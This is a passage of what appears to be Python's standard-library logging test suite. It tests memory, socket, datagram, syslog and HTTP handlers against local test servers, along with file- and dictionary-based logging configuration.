self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
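    # Note: the MemoryHandler set up above buffers records and flushes them to
    # self.root_hdlr either when its capacity (10 records) is reached or when
    # a record of severity WARNING or higher arrives; the tests below exercise
    # both triggers.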
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
def test_race_between_set_target_and_flush(self):
class MockRaceConditionHandler:
def __init__(self, mem_hdlr):
self.mem_hdlr = mem_hdlr
self.threads = []
def removeTarget(self):
self.mem_hdlr.setTarget(None)
def handle(self, msg):
thread = threading.Thread(target=self.removeTarget)
self.threads.append(thread)
thread.start()
target = MockRaceConditionHandler(self.mem_hdlr)
try:
self.mem_hdlr.setTarget(target)
for _ in range(10):
time.sleep(0.005)
self.mem_logger.info("not flushed")
self.mem_logger.warning("flushed")
finally:
for thread in target.threads:
support.join_thread(thread)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config 8, check for resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
            # Replace single backslashes with double backslashes on Windows
            # to avoid a unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_config_set_handler_names(self):
test_config = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
handlers=hand1
[handler_hand1]
class=StreamHandler
formatter=form1
[formatter_form1]
format=%(levelname)s ++ %(message)s
"""
self.apply_config(test_config)
self.assertEqual(logging.getLogger().handlers[0].name, 'hand1')
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop()
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
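    # The loop above decodes SocketHandler's wire format: each logical record
    # arrives as a 4-byte big-endian length prefix followed by a pickled dict
    # of the LogRecord's attributes.  A client-side sketch (for illustration
    # only, not used by these tests) would be roughly:
    #
    #     payload = pickle.dumps(record_dict, 1)
    #     sock.sendall(struct.pack('>L', len(payload)) + payload)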
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop()
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
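        # SocketHandler schedules a reconnection attempt after a failure by
        # setting retryTime based on retryStart (backing off by retryFactor up
        # to retryMax); sleeping past retryTime above forces the handler to
        # retry the connection on the next emit.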
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop()
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
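    # DatagramHandler sends the same pickled payload as SocketHandler, still
    # preceded by a 4-byte length prefix even though UDP preserves message
    # boundaries, which is why the prefix is simply sliced off above.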
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop()
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
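        # The b'<11>' prefix is the syslog PRI field: facility * 8 + severity,
        # here LOG_USER (1) * 8 + LOG_ERR (3) = 11.  The handler's
        # encodePriority('user', 'error') computes the same value.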
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(socket_helper.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
            except Exception:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop()
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
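        # HTTPHandler URL-encodes the record's attribute dict and sends it as
        # the query string for GET or as the request body for POST, which is
        # why parse_qs() recovers 'name', 'funcName' and 'msg' above.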
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
    def _assert_survival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
        self._assert_survival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
            # confirm our assumption: the 'py.warnings' logger has no handlers yet
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
class myCustomFormatter:
def __init__(self, fmt, datefmt=None):
pass
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
